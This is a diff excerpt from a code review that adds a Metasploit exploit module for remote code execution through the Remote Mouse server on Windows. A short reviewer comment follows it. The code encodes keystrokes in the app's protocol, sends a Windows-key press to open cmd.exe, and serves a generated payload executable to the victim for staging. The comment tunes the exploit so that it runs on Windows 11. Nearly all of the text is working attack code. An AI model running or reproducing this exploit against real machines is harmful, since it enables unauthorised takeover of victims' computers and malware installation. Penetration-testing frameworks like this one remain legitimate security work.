modules/exploits/windows/misc/remote_mouse_rce.rb

```diff
@@ -0,0 +1,167 @@
+      'P' => '8[ras]101', 'Q' => '8[ras]100', 'R' => '8[ras]103', 'S' => '8[ras]102', 'T' => '7[ras]97',
+      'U' => '7[ras]96', 'V' => '7[ras]99', 'W' => '7[ras]98', 'X' => '8[ras]109', 'Y' => '8[ras]108',
+      'Z' => '8[ras]111',
+
+      'a' => '7[ras]84', 'b' => '7[ras]87', 'c' => '7[ras]86', 'd' => '7[ras]81', 'e' => '7[ras]80',
+      'f' => '7[ras]83', 'g' => '7[ras]82', 'h' => '7[ras]93', 'i' => '7[ras]92', 'j' => '7[ras]95',
+      'k' => '7[ras]94', 'l' => '7[ras]89', 'm' => '7[ras]88', 'n' => '7[ras]91', 'o' => '7[ras]90',
+      'p' => '7[ras]69', 'q' => '7[ras]68', 'r' => '7[ras]71', 's' => '7[ras]70', 't' => '7[ras]65',
+      'u' => '7[ras]64', 'v' => '7[ras]67', 'w' => '7[ras]66', 'x' => '7[ras]77', 'y' => '7[ras]76',
+      'z' => '7[ras]79',
+
+      '1' => '6[ras]4', '2' => '6[ras]7', '3' => '6[ras]6', '4' => '6[ras]1', '5' => '6[ras]0',
+      '6' => '6[ras]3', '7' => '6[ras]2', '8' => '7[ras]13', '9' => '7[ras]12', '0' => '6[ras]5',
+
+      "\n" => '3RTN', "\b" => '3BAS', ' ' => '7[ras]21',
+
+      '+' => '7[ras]30', '=' => '6[ras]8', '/' => '7[ras]26', '_' => '8[ras]106', '<' => '6[ras]9',
+      '>' => '7[ras]11', '[' => '8[ras]110', ']' => '8[ras]104', '!' => '7[ras]20', '@' => '8[ras]117',
+      '#' => '7[ras]22', '$' => '7[ras]17', '%' => '7[ras]16', '^' => '8[ras]107', '&' => '7[ras]19',
+      '*' => '7[ras]31', '(' => '7[ras]29', ')' => '7[ras]28', '-' => '7[ras]24', "'" => '7[ras]18',
+      '"' => '7[ras]23', ':' => '7[ras]15', ';' => '7[ras]14', '?' => '7[ras]10', '`' => '7[ras]85',
+      '~' => '7[ras]75', '\\' => '8[ras]105', '|' => '7[ras]73', '{' => '7[ras]78', '}' => '7[ras]72',
+      ',' => '7[ras]25', '.' => '7[ras]27'
+    }
+    "key  #{characters[key]}"
+  end
+
+  def windows_key
+    'key  3cmd'
+  end
+
+  def check
+    connect
+    response = sock.get_once
+    disconnect
+    if response.include?('SIN 15win nop nop')
+      splits = response.split(' ')
+      return CheckCode::Appears("Received handshake with version: #{splits.last}")
+    end
+
+    CheckCode::Unknown('Invalid response from target')
+  end
+
+  def send_command(command)
+    if command == windows_key
+      sock.put(command)
+    elsif (command == "\n") || (command == "\b") # dont split this up
+      sock.put(key_value(c))
+    else
+      command.each_char do |c|
+        sock.put(key_value(c))
+        # sleep(datastore['SLEEP'] / 5) # real small sleep between characters
+      end
+      sock.put(key_value("\n"))
+    end
+    sleep(datastore['SLEEP'])
+  end
+
+  def on_request_uri(cli, _req)
+    p = generate_payload_exe
+    send_response(cli, p)
+    print_good("Payload request received, sending #{p.length} bytes of payload for staging")
+  end
+
+  def exploit
+    connect
+
+    print_status('Connecting')
+    print_status('Sending Windows key')
+    send_command(windows_key)
+
+    print_status('Opening command prompt')
+    send_command('cmd.exe')
+
```

Comment:
Additional: send_command('')
This resolves GUI inconsistencies with newline\return. 
Was unable to get command execution working appropriately on Win 11 without.